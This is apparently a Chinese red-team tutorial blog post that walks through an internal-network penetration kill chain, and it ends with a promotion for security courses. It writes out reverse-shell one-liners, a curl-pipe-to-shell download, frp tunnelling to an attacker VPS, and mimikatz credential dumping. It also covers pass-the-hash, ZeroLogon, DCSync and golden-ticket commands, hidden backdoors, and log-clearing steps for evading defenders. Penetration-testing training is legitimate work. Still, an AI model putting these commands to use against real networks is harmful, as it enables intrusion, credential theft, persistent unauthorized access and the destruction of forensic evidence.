
写在前面“外网打点成功之后拿到一台机器然后呢”这个问题是很多Web渗透选手转型内网渗透时遇到的第一个困惑。会打Web不代表会打内网。内网渗透和Web渗透完全是两套技术体系。我自己从Web渗透转到内网渗透的时候也是一头雾水。拿到了Shell却不知道下一步做什么看了一堆概念却串不起来。后来在多次护网和红队评估中摸爬滚打才把这条链路彻底跑通。今天我把内网渗透的完整攻击链路拆成7个阶段每个阶段都讲清楚做什么、用什么工具、注意什么坑。不管你是准备护网还是想进红队这篇都能帮到你。⚠️ 注意本文所有技术仅用于授权的安全测试。未经授权的渗透测试是违法行为。攻击链路全景图外网边界突破 → 初始立足 → 内网信息收集 → 权限提升 → 横向移动 → 域控拿下 → 权限维持 ↓ ↓ ↓ ↓ ↓ ↓ ↓ Web漏洞 WebShell 存活探测 本地提权 票据传递 域控漏洞 黄金票据 弱口令 内存马 端口扫描 内核漏洞 PTH攻击 Kerberos 隐藏后门 社会工程 反弹Shell 资产识别 配置错误 PsExec 金钥匙 计划任务 边界设备 正向代理 域信息收集 提权逃逸 WMI ZeroLogon 注册表自启 提示实际渗透中不是线性流程需要不断收集信息、调整策略、循环推进。阶段一外网边界突破目标拿到内网第一台机器的初始权限常见突破口突破方式成功率常见入口检测难度Web应用漏洞★★★★★SQL注入、文件上传、RCE中弱口令/默认口令★★★★VPN、SSH、RDP、数据库低社会工程学★★★★钓鱼邮件、水坑攻击低边界设备漏洞★★★防火墙、路由器、VPN设备高API未授权访问★★★RESTful API、GraphQL中供应链攻击★★第三方组件、外包系统高外网信息收集流程# 1. 子域名收集python3 oneforall.py--targettarget.com run subfinder-dtarget.com-silent# 2. 端口扫描masscan -p1-655351.2.3.4--rate1000nmap-sV-sC-p80,443,22,3389,33061.2.3.4# 3. 目录扫描dirsearch-uhttps://target.com gobusterdir-uhttps://target.com-wwordlist.txt# 4. 指纹识别whatweb https://target.com wappalyzer-cli https://target.com# 5. 历史漏洞匹配# 根据指纹信息在CVE库和Exploit-DB中搜索对应漏洞searchsploit组件名版本号典型突破口案例 案例一Web应用RCE通过目录扫描发现/actuator/envSpring Boot Actuator未授权利用JNDI注入实现RCE。 案例二VPN弱口令外网SSL VPN使用默认口令admin/admin或弱口令直接登录后利用任意文件读取获取内网信息。 案例三邮件钓鱼投递携带木马的钓鱼邮件员工点击后执行木马反弹Shell回连。⚠️ 注意边界突破阶段优先选择隐蔽性高、动静小的方式。动静太大的入口容易被蓝队发现并封堵。阶段二初始立足目标在目标机器上建立稳定的访问通道常见Shell类型Shell类型环境命令隐蔽性反弹Bash ShellLinuxbash -i /dev/tcp/IP/PORT 01低反弹PowerShellWindowspowershell -nop -w hidden -c IEX(New-Object Net.Sockets.TCPClient)...中反弹Python Shell通用python -c import socket,subprocess,os;...中加密Shell (ICMP)受限环境ICMP隧道高加密Shell (DNS)受限环境DNS隧道高WebShellWeb服务一句话木马/内存马中~高代理与隧道技术 提示内网环境通常无法直连外网需要通过已有Shell建立代理通道。技术适用场景工具正向代理目标可入站reGeorg、suo5反向代理目标可出站frp、npsSOCKS代理通用chisel、ewHTTP隧道仅允许HTTP出站Neo-reGeorgICMP隧道仅允许ICMPicmptunnelDNS隧道仅允许DNS出站dnscat2# frp反向代理配置示例# frpc.ini (目标机器)[common]server_addr你的VPS_IP server_port7000[socks5]typetcp remote_port1080pluginsocks5# 本地通过socks5代理访问内网proxychains nmap-sT-Pn10.10.1.0/24权限维持维持方式系统命令/操作隐蔽性计划任务Linuxcrontab -e; 0 * * * * /tmp/.shell中SSH公钥Linuxecho key ~/.ssh/authorized_keys高自启动服务Linuxsystemctl enable backdoor中注册表WindowsHKCU\...\Run中计划任务Windowsschtasks /create /tn update /tr payload中WMI事件订阅Windows__EventFilterEventConsumer高内存马Web注入到Web进程高⚠️ 注意权限维持要权衡隐蔽性和持久性。太持久的后门容易被发现太隐蔽的可能重启后丢失。阶段三内网信息收集目标摸清内网环境找到下一步的攻击目标本机信息收集# Linux本机信息hostname# 主机名ifconfig/ipaddr# 网络配置cat/etc/hosts# 主机解析cat/etc/resolv.conf# DNS配置whoamiid# 当前用户和权限uname-a# 内核版本cat/etc/passwd# 用户列表cat/etc/shadow# 密码哈希(需root)sudo-l# sudo权限cat/etc/crontab# 计划任务netstat-antp# 网络连接psaux# 进程列表find/-perm-us-typef# SUID文件# Windows本机信息hostname ipconfig/all systeminfo whoami/all net user# 本地用户net localgroup administrators net accounts# 密码策略query user# 在线用户netstat-ano# 网络连接tasklist/svc# 进程和服务wmic product get name,version# 已安装软件内网存活探测方式命令适用场景ICMP探测for i in $(seq 1 254); do ping -c 1 10.10.1.$i; done通用ARP探测arp-scan -l/netdiscover -r 10.10.1.0/24同网段Nmap存活nmap -sn 10.10.1.0/24通用CrackMapExeccrackmapexec smb 10.10.1.0/24域环境PowerShellTest-Connection 10.10.1.5 -Count 1Windows域信息收集# 判断是否在域内nettime/domain# Windows返回域控时间说明在域内nltest /domain_trusts# 查看域信任关系# 域基本信息net groupdomain admins/domain# 域管理员列表net groupdomain controllers/domain# 域控列表net user /domain# 域用户列表net groupdomain computers/domain# 域内机器列表nltest /dsgetdc:domain_name# 域控信息# 使用BloodHound采集域信息# SharpHound采集SharpHound.exe-cAll--outputdirectoryC:\temp\# Python版采集bloodhound-python-ddomain.local-uuser-ppass-nsDC_IP-cAll 提示BloodHound是内网渗透最重要的工具之一。它能可视化域内权限关系自动发现从普通用户到Domain Admin的攻击路径。阶段四权限提升目标从普通权限提升到管理员/SYSTEM权限Linux提权提权方式检查方法利用工具内核漏洞uname -a→ searchsploitCVE-2016-5195等SUID提权find / -perm -us -type f 2/dev/nullGTFOBinsSudo误配sudo -l直接利用计划任务cat /etc/crontab路径劫持可写脚本find / -writable 2/dev/null内容注入密码复用su -直接切换环境变量echo $PATHPATH注入Windows提权提权方式检查方法利用工具内核漏洞systeminfo→ WatsonMS16-032等服务路径sc qc检查未引用路径PowerShellAlwaysInstallElevatedreg query HKCU\...\AlwaysInstallElevatedmsi提权令牌窃取whoami /priv检查权限IncognitoUnquoted Pathwmic service get name,displayname,pathname路径写入自动化检查一键检查WinPEAS、PowerUp# 自动化提权信息收集# Linuxcurl-Lhttps://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh|sh# Windows# 下载WinPEAS到目标执行WinPEASx64.exe⚠️ 注意提权前先做信息收集不要上来就跑EXP。内核提权EXP可能导致蓝屏需要谨慎选择。阶段五横向移动目标从当前机器移动到其他内网机器尤其是域控凭证收集 提示横向移动的前提是有可用的凭证密码或哈希。凭证类型来源采集工具明文密码LSASS内存mimikatzNTLM哈希SAM文件mimikatz、secretsdump缓存票据内存中mimikatzSSH私钥~/.ssh/直接读取配置文件密码各种配置find grep浏览器密码Chrome/FirefoxLaZagne数据库密码配置文件find grep# mimikatz获取凭证mimikatzprivilege::debugsekurlsa::logonpasswordsexitmimikatzlsadump::samexitmimikatzsekurlsa::ticketsexit横向移动技术技术原理命令/工具适用场景PTHPass The Hash用哈希直接认证crackmapexec smb IP -u user -H hash有NTLM哈希PsExec远程执行命令psexec.py user:passIP有明文密码WMIWindows管理接口wmiexec.py user:passIP有明文密码WinRM远程管理evil-winrm -u user -p pass -i IP有明文密码RDP远程桌面直接连接有明文密码Kerberoasting票据请求Rubeus / Impacket域环境AS-REP Roasting离线爆破Rubeus / hashcat域环境PTTPass The Ticketmimikatz有票据# CrackMapExec批量横向crackmapexec smb10.10.1.0/24-uadministrator-Haad3b435b51404eeaad3b435b51404ee:NT_HASH# Impacket PsExecpython3 psexec.py domain/administrator:password10.10.1.5# Impacket WMIpython3 wmiexec.py domain/administrator:password10.10.1.5# evil-winrmevil-winrm-uadministrator-ppassword-i10.10.1.5阶段六域控拿下目标获取Domain Admin权限控制整个域域控攻击路径攻击手法原理前置条件工具ZeroLogonCVE-2020-1472Netlogon协议缺陷能访问域控445端口CVE-2020-1472 EXPKerberoasting请求服务票据后离线爆破有域用户凭证Rubeus hashcatAS-REP Roasting禁用预认证的用户票据爆破用户禁用了预认证hashcat黄金票据用krbtgt哈希伪造TGT票据拿到krbtgt哈希mimikatz白银票据用服务账户哈希伪造TGS有服务账户哈希mimikatzDCSync模拟域控同步获取哈希有DCSync权限mimikatz / secretsdumpADCS攻击证书服务配置错误域内有ADCScertipyGPO滥用组策略对象权限误配有GPO编辑权限GroupPolicy模块# ZeroLogon攻击空密码打域控python3 cve-2020-1472-exploit.py DC_IP DC_NAME# DCSync获取krbtgt哈希mimikatzlsadump::dcsync /domain:domain.local /user:krbtgtexit# 或者用impacketpython3 secretsdump.py domain/user:passDC_IP -just-dc-user krbtgt# 黄金票据伪造mimikatzkerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:krbtgt_hash /user:Administrator /id:500 /pttexit# KerberoastingRubeus.exe kerberoast /outfile:hashes.txt hashcat-m13100hashes.txt wordlist.txt⚠️ 注意ZeroLogon攻击可能导致域控网络中断在真实评估中慎用。优先选择Kerberoasting或DCSync等更隐蔽的方式。阶段七权限维持与痕迹清理目标保持长期访问权限清理操作痕迹权限维持维持方式系统说明黄金票据AD域用krbtgt哈希可随时生成管理员票据有效期10年Skeleton KeyAD域在域控注入万能密码所有用户可用密码登录AdminSDHolderAD域利用ACL保护后门权限不被重置WMI事件订阅Windows隐蔽的事件触发后门COM劫持Windows利用COM加载机制加载恶意DLL注册表自启WindowsRun键值、Winlogon等计划任务Linux/Windows定时执行后门痕迹清理清理项命令注意事项命令历史history -c rm ~/.bash_historyLinux日志清理wevtutil cl SystemWindows事件日志日志清理clearevMeterpreter临时文件rm -rf /tmp/.xxx避免遗留工具清理删除上传的工具避免被发现⚠️ 注意痕迹清理要克制。大量清理日志本身也是一种告警信号。精准清理关键痕迹比全删更安全。实战案例一条完整的内网攻击链 以下为模拟靶场环境的完整攻击链路仅供参考学习。Step 1: 外网发现Spring Boot Actuator未授权 → JNDI注入RCE Step 2: 反弹Shell → 上线frp代理 → SOCKS5通道打通 Step 3: 内网存活探测 → 发现3台Windows机器 1台域控 Step 4: mimikatz抓取本机密码 → 发现域用户凭证 Step 5: Kerberoasting → 获取服务票据 → hashcat爆破出明文 Step 6: 用域用户凭证登录其他机器 → 横向移动 Step 7: 在管理员机器上抓取到域管哈希 → PTH到域控 Step 8: DCSync获取krbtgt → 生成黄金票据 → 域控拿下学习建议 提示内网渗透需要大量的实战练习以下推荐路径。阶段推荐资源目标基础Hack The Box Active Directory路径理解域渗透基本流程进阶TCM Security PNPT课程系统学习内网渗透实战HTB Pro Labs - Dante连续内网环境实战实战HTB Pro Labs - Zephyr企业级红队环境认证OSCP考试行业认可的实战能力证明学习资源2026年最新版本全网最全的网安视频教程。耗时半年打造之前都是内部资源专业方面绝对可以秒杀国内99%的机构和个人教学全网独一份你不可能在网上找到这么专业的教程。内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识而且包含了中级的各种渗透技术并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频200多G的资源不用担心学不全。包含攻击与防守、漏洞挖掘、CTF比赛等技术点1、知识库价值深度本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、部分核心内容展示独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。网络安全意识Linux操作系统WEB架构基础与HTTP协议Web渗透测试渗透测试案例分享渗透测试实战技巧攻防对战实战CTF之MISC实战讲解3、适合学习的人群一、基础适配人群零基础转型者适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链开发/运维人员具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展或者转行就业应届毕业生计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期二、能力提升适配1、技术爱好者适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者2、安全从业者帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力3、合规需求者包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传戳下面拿这些东西我都可以免费分享给大家需要的可以点这里自取:————————————————